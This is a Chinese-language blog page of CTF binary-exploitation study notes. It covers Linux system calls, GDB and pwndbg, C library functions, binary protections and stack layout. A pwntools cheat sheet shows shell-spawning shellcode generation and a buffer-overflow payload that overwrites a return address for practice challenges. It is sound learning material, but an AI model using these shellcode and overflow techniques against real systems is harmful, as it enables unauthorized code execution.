<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="Linux知识常用命令史上最全的Linux常用命令汇总（超全面！超详细！） 12345find &#x2F; -name &quot;文件名&quot;#查找文件所在位置sudo -s#进入root权限  内核缓冲技术外围设备即计算机系统中除主机外的其他设备。包括输入和输出设备、外存储器、模数转换器、数模转换器、外围处理机等。是计算机与外界进行通信的工具。例如打印机、磁盘驱动器或键盘。 内核空间与用户空间，">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2022/02/12/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Linux知识常用命令史上最全的Linux常用命令汇总（超全面！超详细！） 12345find &#x2F; -name &quot;文件名&quot;#查找文件所在位置sudo -s#进入root权限  内核缓冲技术外围设备即计算机系统中除主机外的其他设备。包括输入和输出设备、外存储器、模数转换器、数模转换器、外围处理机等。是计算机与外界进行通信的工具。例如打印机、磁盘驱动器或键盘。 内核空间与用户空间，">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210130124001472.png">
<meta property="og:image" content="c:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20220213224820235.png">
<meta property="og:image" content="c:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20220213231828239.png">
<meta property="og:image" content="https://images0.cnblogs.com/i/569008/201405/271650059007975.jpg">
<meta property="og:image" content="c:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20220214161648989.png">
<meta property="article:published_time" content="2022-02-12T14:41:09.231Z">
<meta property="article:modified_time" content="2022-03-24T12:06:27.102Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20210130124001472.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.0.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-基础知识" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/02/12/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" class="article-date">
  <time class="dt-published" datetime="2022-02-12T14:41:09.231Z" itemprop="datePublished">2022-02-12</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="Linux知识"><a href="#Linux知识" class="headerlink" title="Linux知识"></a>Linux知识</h1><h2 id="常用命令"><a href="#常用命令" class="headerlink" title="常用命令"></a>常用命令</h2><p><strong><a target="_blank" rel="noopener" href="https://wlybsy.blog.csdn.net/article/details/105289038">史上最全的Linux常用命令汇总（超全面！超详细！）</a></strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">find / -name <span class="string">&quot;文件名&quot;</span></span><br><span class="line"><span class="comment">#查找文件所在位置</span></span><br><span class="line"></span><br><span class="line">sudo -s</span><br><span class="line"><span class="comment">#进入root权限</span></span><br></pre></td></tr></table></figure>

<h2 id="内核缓冲技术"><a href="#内核缓冲技术" class="headerlink" title="内核缓冲技术"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/sumx2015/article/details/81059989"><strong>内核缓冲技术</strong></a></h2><p><strong>外围设备</strong>即计算机系统中除主机外的其他设备。包括输入和<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E8%BE%93%E5%87%BA%E8%AE%BE%E5%A4%87/10823333">输出设备</a>、<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E5%A4%96%E5%AD%98%E5%82%A8%E5%99%A8/1226993">外存储器</a>、<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E6%A8%A1%E6%95%B0%E8%BD%AC%E6%8D%A2%E5%99%A8/7745507">模数转换器</a>、数模转换器、<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E5%A4%96%E5%9B%B4%E5%A4%84%E7%90%86%E6%9C%BA/4963203">外围处理机</a>等。是计算机与外界进行通信的工具。例如打印机、<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E7%A3%81%E7%9B%98%E9%A9%B1%E5%8A%A8%E5%99%A8/5900722">磁盘驱动器</a>或键盘。</p>
<p><a target="_blank" rel="noopener" href="https://zhidao.baidu.com/question/409060193.html"><strong>内核空间与用户空间</strong></a>，内核是操作系统的内部核心程序，它向外部提供了对计算机设备的核心管理调用。</p>
<h2 id="文件描述符"><a href="#文件描述符" class="headerlink" title="文件描述符"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/yushuaigee/article/details/107883964"><strong>文件描述符</strong></a></h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_28114615/article/details/94590598">Linux中文件描述符的理解（文件描述符、文件表项、i-node）</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weiqifa0/article/details/106270760">Linux 下的0 1 2特殊文件描述符~</a></p>
<p><strong>标准输入0，标准输出1，标准错误2</strong>。所以read的描述符为0表示从终端输入，write的描述符为1，表示会输出到终端。</p>
<h2 id="系统调用"><a href="#系统调用" class="headerlink" title="系统调用"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/xiaominthere/article/details/17287965">系统调用</a></h2><p>系统调用提供用户程序和操作系统之间的接口，向操作系统内核请求更高权限的服务。</p>
<p>Linux的系统调用通过**<code> int 80h</code><strong>命令实现，使用</strong>系统调用号**来区分入口函数。</p>
<p>系统调用号放在EAX中，参数放在对应的寄存器中，通过<code>int 80h</code>调用，根据寄存器保存的值进入对应的函数中。</p>
<p><code>sys_exceve</code>是运行文件的函数命令，它的参数是对应文件的路径，如<code>\bin\sh</code>，放在EBX中。</p>
<p><a href="D:\CX_appoincation\Typora\Node\PWN\题目总集">题目<code>BUU others_shellcode</code></a></p>
<h2 id="行缓存和无缓冲"><a href="#行缓存和无缓冲" class="headerlink" title="行缓存和无缓冲"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45309916/article/details/115826040">行缓存和无缓冲</a></h2><p>write函数是无缓冲，可以直接输出。而printf函数是行缓存，只有满足了一行才会输出。</p>
<h1 id="GDB调试"><a href="#GDB调试" class="headerlink" title="GDB调试"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/niyaozuozuihao/article/details/91802994">GDB调试</a></h1><p>用<code>BUU ciscn_2019_n_5 </code>为调试文件，<a target="_blank" rel="noopener" href="https://files.buuoj.cn/files/1bfd8d6bbed3292c3c5d4004f7353eaf/ciscn_2019_n_5">附件下载</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41560595/article/details/108710625">安装插件gef，pwndbg，peda</a></p>
<p>在最后执行<code>vim ~/.gdbinit</code>命令，确保内容如下：使用哪一个工具，注释其他两个即可。</p>
<p><img src="https://img-blog.csdnimg.cn/20210130124001472.png" alt="在这里插入图片描述"></p>
<h2 id="动态调脚本"><a href="#动态调脚本" class="headerlink" title="动态调脚本"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_33458986/article/details/105319808">动态调脚本</a></h2><blockquote>
<p>gdb.attach( io, ‘b* main’)<br>pause()<br>设置断点</p>
<p>./buu18.py<br>在命令行直接运行脚本，会出现gdb调试窗口</p>
</blockquote>
<h2 id="常用指令"><a href="#常用指令" class="headerlink" title="常用指令"></a>常用指令</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">b *&lt;address&gt; /b 函数名</span><br><span class="line"><span class="comment">#设置断点</span></span><br><span class="line"></span><br><span class="line">n <span class="comment">#单步执行</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/super119/archive/2011/03/26/1996125.html">查找地址中的内容：</a></p>
<blockquote>
<p> x/ <nfu> address</p>
<p>x/s address 输出字符串</p>
<p>更多的是查找数据，如栈上保存的地址</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_28499879/article/details/120670684">查找地址的汇编指令：</a></p>
<blockquote>
<p>反汇编指令</p>
<p>disassembel [startaddress], [endaddress]</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/zino00/article/details/122716412">pwndbg的安装和gdb使用</a></p>
<blockquote>
<p><code>heapinfo、heapinfoall</code> //显示堆的信息，和bins的挺像的，没bins好用</p>
<p><code>parseheap</code> //显示堆结构，很好用</p>
<p><code>tracemalloc</code> //好用，会跟提示所有操作堆的地方</p>
</blockquote>
<h2 id="Tmux使用"><a href="#Tmux使用" class="headerlink" title="Tmux使用"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_40449300/article/details/81879781">Tmux使用</a></h2><p><a target="_blank" rel="noopener" href="https://wiki.archlinux.org/title/Tmux_(%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87)#%E5%90%AF%E5%8A%A8%E6%97%B6%E4%BD%BF%E7%94%A8%E9%BB%98%E8%AE%A4%E5%B8%83%E5%B1%80">https://wiki.archlinux.org/title/Tmux_(%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87)#%E5%90%AF%E5%8A%A8%E6%97%B6%E4%BD%BF%E7%94%A8%E9%BB%98%E8%AE%A4%E5%B8%83%E5%B1%80</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/Breeze_CAT/article/details/103789233">https://blog.csdn.net/Breeze_CAT/article/details/103789233</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/zhwer/p/12494317.html">https://www.cnblogs.com/zhwer/p/12494317.html</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/chen1415886044/article/details/105094688">https://blog.csdn.net/chen1415886044/article/details/105094688</a></p>
<h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><p><a href="D:\CX_appoincation\Typora\Node\PWN\题目总集"><code>BUUothers_shellcode</code></a></p>
<h1 id="数据知识"><a href="#数据知识" class="headerlink" title="数据知识"></a>数据知识</h1><h2 id="数据类型ULL、ll"><a href="#数据类型ULL、ll" class="headerlink" title="数据类型ULL、ll"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/shenwansangz/article/details/40078407">数据类型ULL、ll</a></h2><p>常数以<code>uLL</code>后缀表式该常数为<code>unsight long long</code>型，<code>LL</code>后缀表述该常数为<code>long long</code>型。</p>
<h2 id="浮点数（float）与十六进制-hexadecimal-之间的转换"><a href="#浮点数（float）与十六进制-hexadecimal-之间的转换" class="headerlink" title="浮点数（float）与十六进制(hexadecimal)之间的转换"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/tom739/article/details/103577435">浮点数（float）与十六进制(hexadecimal)之间的转换</a></h2><p><a target="_blank" rel="noopener" href="https://lostphp.com/hexconvert/">进制转换网站</a></p>
<h2 id="ASCLL码表"><a href="#ASCLL码表" class="headerlink" title="ASCLL码表"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/sinat_28631741/article/details/80961033">ASCLL码表</a></h2><h1 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h1><h2 id="dev-urandom生成随机数"><a href="#dev-urandom生成随机数" class="headerlink" title="/dev/urandom生成随机数"></a><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Flychown/p/6868520.html"><code>/dev/urandom</code>生成随机数</a></h2><p><code>/dev/urandom</code>记录Linux下的熵池的文件，是一个文件。所以<code>fd = open(&quot;/dev/urandom&quot;,0)</code>打开文件，0表示以只读模式打开。</p>
<p><code>read(fd, const void *buf ,size_t count)</code>读文件中的内容，即将文件中的随机数放入buf中。</p>
<p><code>srand(v)</code>函数设置随机种子，表示读取文件的起始位置，如果随机种子不变，随机数就不会改变。</p>
<p><code>time(0)</code>值是系统从1970年1月1日到现在总共的秒数。因此<code>v = time(0)</code>就是随机种子在不停的改变。</p>
<h2 id="open-函数"><a href="#open-函数" class="headerlink" title="open()函数"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/ZHJ123CSDN/article/details/104724186">open()函数</a></h2><blockquote>
<p>open(const char* pathname, int flags, …<em>/* mode_t mode */</em>);</p>
</blockquote>
<p>函数说明：pathname是打开的文件名，flags 表示打开文件的方式。 mode表示创建文件的权限。</p>
<p>返回值：成功时返回被打开文件的文件描述符 fd；失败时返回 -1</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/liu995336126/article/details/91413185"><code>open(“dev“,0)</code>的解惑</a>：flags每一个参数都有一个对应的宏的值。</p>
<h2 id="read-函数"><a href="#read-函数" class="headerlink" title="read()函数"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/l1606468155/article/details/83154521">read()函数</a></h2><blockquote>
<p><strong>read (int fd, const void * buf, size_t count)；</strong> </p>
</blockquote>
<p>函数说明：read()会把文件fd中的内存写入count个字节到buf中。</p>
<p>返回值：如果顺利read()会返回实际写入的字节数（len）。当有错误发生时则返回-1，错误代码存入errno中。</p>
<p>程序中fd=0，表示read所对应的文件描述符为0，表示从终端写入。</p>
<h2 id="write-函数"><a href="#write-函数" class="headerlink" title="write()函数"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/boiled_water123/article/details/81951351"><strong>write()函数</strong></a></h2><blockquote>
<p><strong>write (int fd, const void * buf, size_t count)；</strong> </p>
</blockquote>
<p>函数说明：write()会把参数buf所指的内存写入count个字节到参数fd所指的文件内。</p>
<p>返回值：如果顺利write()会返回实际写入的字节数（len）。当有错误发生时则返回-1，错误代码存入errno中。</p>
<p>程序中fd=1，表示write所对应的文件描述符为1，写入的结果会输出到终端。</p>
<h2 id="strncmp函数"><a href="#strncmp函数" class="headerlink" title="strncmp函数"></a>strncmp函数</h2><blockquote>
<p>**int strncmp(const char <em>str1, const char <em>str2, size_t n)</em></em></p>
</blockquote>
<ul>
<li><code>str1</code> – 要进行比较的第一个字符串。</li>
<li><code>str2</code> – 要进行比较的第二个字符串。</li>
<li><code>n</code> – 要比较的最大字符数</li>
</ul>
<p>把 <code>str1</code> 和 <code>str2</code> 进行比较，最多比较前 <code>n</code> 个字节。</p>
<ul>
<li>按照<code>ASCII</code>值进行比较，<code>str1-str2</code>的数值就是返回值。</li>
<li>如果返回值 <code>&lt;</code> 0，则表示 <code>str1</code> 小于 <code>str2</code>。</li>
<li>如果返回值 <code>&gt;</code> 0，则表示 <code>str2</code> 小于 <code>str1</code>。</li>
<li>如果返回值 <code>=</code> 0，则表示 <code>str1</code> 等于 <code>str2</code>。</li>
<li>如果n=0，则返回的结果为0</li>
</ul>
<h2 id="sprintf函数"><a href="#sprintf函数" class="headerlink" title="sprintf函数"></a><strong><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_33912453/article/details/94051785">sprintf函数</a></strong></h2><blockquote>
<p>**int sprintf(char <em>string, char <em>format [,argument,…])</em></em></p>
</blockquote>
<p>sprintf是字符串格式化命令，主要功能是把格式化的数据写入到某个字符串中。</p>
<p>string– 这是指向一个字符数组的指针，该数组存储了 C 字符串。</p>
<p>format– 这是个格式化字符串，将后面接收到的参数换成相应的类型，如%d、%X。</p>
<p>[argument]…：根据不同的 format 字符串，函数可能需要一系列的附加参数，每个参数包含了一个要被插入的值，替换了 format 参数中指定的每个 % 标签。参数的个数应与 % 标签的个数相同。</p>
<p><code>sprintf</code>与<code>printf</code>函数的区别：二者 功能相似，但是 sprintf函数打印到字符串中，而printf函数打印输出到屏幕上。 <strong>sprintf函数在我们完成其他数据类型转换成字符串类型的操作中应用广泛。也就是说比printf多了一个string字符串参量。</strong></p>
<h2 id="std-String"><a href="#std-String" class="headerlink" title="std::String"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/zy2317878/article/details/79056289">std::String</a></h2><p>std::string是C++/C++11中的一个模板类，它是一个标准库。</p>
<h3 id="std-string-operation"><a href="#std-string-operation" class="headerlink" title="std::string::operation ="></a><strong>std::string::operation =</strong></h3><blockquote>
<p>这就是C++中的等号运算符，</p>
<p>std::string::operation =(&amp;input, s) 实际上就相当于  input = s。<br>即将字符串s赋值给input所在的地址</p>
</blockquote>
<h2 id="std-allocator"><a href="#std-allocator" class="headerlink" title="std::allocator"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/fengbingchun/article/details/78943527">std::allocator</a></h2><h2 id="atoi-函数"><a href="#atoi-函数" class="headerlink" title="atoi()函数"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/u010806950/article/details/105505540">atoi()函数</a></h2><blockquote>
<p>v = atoi(nptr)</p>
</blockquote>
<p><code>nptr</code>是字符串，将字符串转换成int型，v是int型。字符串中必须是数字和+、-才合法。</p>
<h1 id="PWN基础总结"><a href="#PWN基础总结" class="headerlink" title="PWN基础总结"></a>PWN基础总结</h1><p><strong><a target="_blank" rel="noopener" href="http://tttang.com/archive/1361/">pwn基础总结(除堆以外)</a></strong></p>
<h2 id="pwn保护机制"><a href="#pwn保护机制" class="headerlink" title="pwn保护机制"></a><strong><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_44108455/article/details/104985351">pwn保护机制</a></strong></h2><p>**<code>checksec</code>**用来检查可执行文件的属性。</p>
<p><a target="_blank" rel="noopener" href="http://tttang.com/archive/1361/#toc_arch"><code>Arch</code></a></p>
<blockquote>
<p>说明程序的架构是x86架构——32/64为程序 ——小/大段字节序号</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="http://tttang.com/archive/1361/#toc_pie"><code>PIE</code></a></p>
<blockquote>
<p>PIE enabled如果程序开启这个地址随机化选项就意味着程序每次运行的时候地址都会变化，而如果没有开PIE的话那么No PIE (0x400000)，括号内的数据就是程序的基地址.</p>
<p>也不能进行调试</p>
</blockquote>
<h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h2><p>返回地址：</p>
<blockquote>
<p>对于函数的返回地址，最好不要乱写，打远程时，如果程序是异常退出了，最后是不给你回显的。所以我们得想办法让程序正常退出。</p>
</blockquote>
<p>printf函数：</p>
<blockquote>
<p>printf()函数是行缓存函数，只有遇到\n才会输出前面的字符串，在输出时，尽量使用write()函数。</p>
</blockquote>
<h2 id="常见代码"><a href="#常见代码" class="headerlink" title="常见代码"></a>常见代码</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/abcdefg90876/article/details/105445579">**<code>#!/usr/bin/python</code>**的作用</a></p>
<blockquote>
<p>指出想要这个文件中的代码用什么可执行程序去运行。</p>
<p><strong>#!/usr/bin/python</strong>是告诉操作系统执行这个脚本的时候，调用/usr/bin下的python解释器。</p>
<p><strong>#!/usr/bin/env python</strong>这种用法是为了防止操作系统用户没有将python装在默认的/usr/bin路径里。当系统看到这一行的时候，首先会到env设置里查找python的安装路径，再调用对应路径下的解释器程序完成操作。</p>
<p>没有这一行命令在终端运行脚本时必须用  python 文件名</p>
</blockquote>
<p><strong>输入<code>send</code>理解</strong></p>
<blockquote>
<p>send()、sendline()、sendafter()、sendlineafter()</p>
<p><strong>主要作用：</strong>发送payload 发给read()、scanf()、gets()等读入函数。</p>
<p>payload的格式有 ‘a’*m字符串 和 p64()打包。<br>对于输入的字符，如果是数字比如’1’，会根据scanf()等函数来判断是整数类型还是字符类型。scanf()中的格式化字符串就决定了’1’的类型。</p>
<p>p32(address)/p64(address) 由于在计算机内存中，每个值都是按照字节存储的。一般情况下都是采用小端存储，即 0x0804843B 在内存中的形式是<br>‘\x3b\x84\x04\x08’。打包一个数字，通常是一个十六进制地址，打包成32位或者64位。<strong>得到的也是用字符串打包起来的地址。</strong></p>
<p>对于函数的参数，可以是数据段的地址，也可以直接是数据，但必须保证它只占4个字节(32位)的内存。</p>
<p>如果不是作为参数，只是普通的输入，可以直接输入字符串，根据输入的字节大小。</p>
</blockquote>
<p>输出<code>recv</code>理解</p>
<blockquote>
<p>recv()、recvuntil()</p>
<p><strong>主要作用：</strong>接收由write()、printf()、put()等输出函数的输出</p>
<p>接收到的数据，是以十六进制的格式，但是没有加0x，因此计算机并不知道它是16进制，而是看成10进制。**int(x, 16)<strong>将x看成16进制，然后转换成对应的10进制。和</strong>u32\u64()**的用法相同。</p>
<p>经常是u32( io.recv() )或者int( io.recv() )然后hex（x）是将x看成10进制，然后转换成16进制。</p>
<p><strong>recv接收输出一定会按顺序将所有的输出接收，和send输入无关，send输入之前的输出没有接收也会被接收。你可以理解为程序中输出的字符串会保存在输出流中，当我们接收字符串的时候就会从输出流中</strong></p>
<p><strong>recv(6).ljust(8,’\x00’)</strong><br>.ljust是python的函数，在左端添加字符。.rjust是在右端添加字符。</p>
<p><strong>p.recvuntil(‘\x7f’)[-6:].ljust(8, ‘\x00’)</strong><br>地址的下一个字节是\x7f开头，\xf前六个字节就是接收的地址</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>) </span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;设置环境，这句话的意思是</span></span><br><span class="line"><span class="string">1. os设置系统为linux系统，在完成ctf题目的时候，大多数pwn题目的系统都是linux</span></span><br><span class="line"><span class="string">2. arch设置架构为amd64，可以简单的认为设置为64位的模式，对应的32位模式是’i386’</span></span><br><span class="line"><span class="string">3. log_level设置日志输出的等级为debug，这句话在调试的时候一般会设置，这样pwntools会将完整的io过程都打印下来，使得调试更加方便&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&#x27;文件名./tset&#x27;</span>)</span><br><span class="line"><span class="comment">#使用本地文件。</span></span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">&#x27; IP&#x27;</span>,端口)</span><br><span class="line"><span class="comment">#建立一个远程连接。</span></span><br><span class="line"><span class="comment">#进入到输入的地方，read（）函数或者cin或者scanf函数</span></span><br><span class="line"></span><br><span class="line">asm(<span class="string">&#x27;mov eac,0&#x27;</span>)</span><br><span class="line"><span class="comment">#asm()函数接收一个字符串作为参数，得到汇编码的机器代码。</span></span><br><span class="line"><span class="comment">#可以用来编写shellcode指令</span></span><br><span class="line"></span><br><span class="line">r.interactive()</span><br><span class="line"><span class="comment">#将控制权交给用户，这样可以使用打开的shell了</span></span><br><span class="line"></span><br><span class="line">p32(地址名)/p64(地址名)</span><br><span class="line"><span class="comment">#由于在计算机内存中，每个值都是按照字节存储的。一般情况下都是采用小端存储，即 0x0804843B 在内存中的形式是</span></span><br><span class="line"><span class="string">&#x27;\x3b\x84\x04\x08&#x27;</span></span><br><span class="line"><span class="comment">#打包一个数字，通常是一个地址，打包成32位或者64位。</span></span><br><span class="line"><span class="comment">#得到的也是用字符串打包起来的地址</span></span><br><span class="line">payload = p32(<span class="number">0xdeadbeef</span>)</span><br><span class="line"></span><br><span class="line">u32/u64 </span><br><span class="line"><span class="comment">#解包一个字符串，得到整数。</span></span><br><span class="line"></span><br><span class="line">send(payload) </span><br><span class="line"><span class="comment">#发送payload 发给read（）、scanf（）、gets</span></span><br><span class="line"></span><br><span class="line">sendline(payload)</span><br><span class="line"><span class="comment">#发送payload，并进行换行（末尾\n）</span></span><br><span class="line"></span><br><span class="line">sendafter(some_string, payload) </span><br><span class="line"><span class="comment">#接收到 some_string 后, 发送你的 payload</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#需要注意的是，接收字符并不是在程序输出字符串的时候，你可以理解为程序中输出的字符串会保存在输出流中，当我们接收字符串的时候就会从输出流中</span></span><br><span class="line">recv(N) </span><br><span class="line"><span class="comment">#接受 N(数字) 字符</span></span><br><span class="line"></span><br><span class="line">recvline()</span><br><span class="line"><span class="comment">#接收一行输出</span></span><br><span class="line"></span><br><span class="line">recvlines(N) </span><br><span class="line"><span class="comment">#接收 N(数字) 行输出</span></span><br><span class="line"></span><br><span class="line">recvuntil(some_string) </span><br><span class="line"><span class="comment">#接收到 some_string 为止</span></span><br><span class="line"></span><br><span class="line"><span class="number">32</span>位：</span><br><span class="line"><span class="built_in">print</span>(shellcraft.sh()) </span><br><span class="line"><span class="comment">#生成的是shell的汇编代码</span></span><br><span class="line"><span class="built_in">print</span>(asm(shellcraft.sh())) </span><br><span class="line"><span class="comment">#生成的是shell的机械码</span></span><br><span class="line"></span><br><span class="line"><span class="number">64</span>位：</span><br><span class="line">context.arch=“amd64”</span><br><span class="line"><span class="built_in">print</span>(shellcraft.sh()) </span><br><span class="line"><span class="comment">#生成的是shell的汇编代码</span></span><br><span class="line"><span class="built_in">print</span>(asm(shellcraft.sh())) </span><br><span class="line"><span class="comment">#生成的是shell的机械码</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sh.sendline(shellcode.ljust(<span class="number">112</span>, <span class="string">&#x27;a&#x27;</span>) + p32(buf))</span><br><span class="line"><span class="comment"># ljust是不满足112的话就用b&#x27;a&#x27;补足，以便我们可以覆盖ebp</span></span><br><span class="line"><span class="comment"># 后面那个p32就是把已经写入shellcode的可执行段的地址写入ebp寄存器</span></span><br><span class="line"></span><br><span class="line">recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line"><span class="comment">#.ljust是python的函数，在左端添加字符。.rjust是在右端添加字符。</span></span><br></pre></td></tr></table></figure>



<h1 id="基础栈介绍"><a href="#基础栈介绍" class="headerlink" title="基础栈介绍"></a><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/stack-intro/#_2">基础栈介绍</a></h1><p>每个程序在运行时都有<strong>虚拟地址空间</strong>，其中某一部分就是该程序对应的栈，用于<strong>保存<u>函数调用信息</u>和<u>局部变量</u><strong>。此外，常见的操作也是压栈与出栈。需要注意的是，</strong>程序的栈是从进程地址空间的高地址向低地址增长的</strong>。</p>
<p><img src="C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20220213224820235.png" alt="image-20220213224820235"></p>
<h2 id="C语言函数调用栈（一）"><a href="#C语言函数调用栈（一）" class="headerlink" title="C语言函数调用栈（一）"></a><a target="_blank" rel="noopener" href="https://www.cnblogs.com/clover-toeic/p/3755401.html">C语言函数调用栈（一）</a></h2><p>程序的执行可以看作是连续的函数调用，函数调用的过程通常使用堆栈实现。堆栈上的主要保存：</p>
<ol>
<li>函数参数</li>
<li>函数返回地址</li>
<li>临时保存寄存器原有值(即函数调用的上下文)</li>
<li>存储本地局部变量</li>
</ol>
<p>栈帧指针寄存器FP，在Intel CPU中用BP作帧指针。</p>
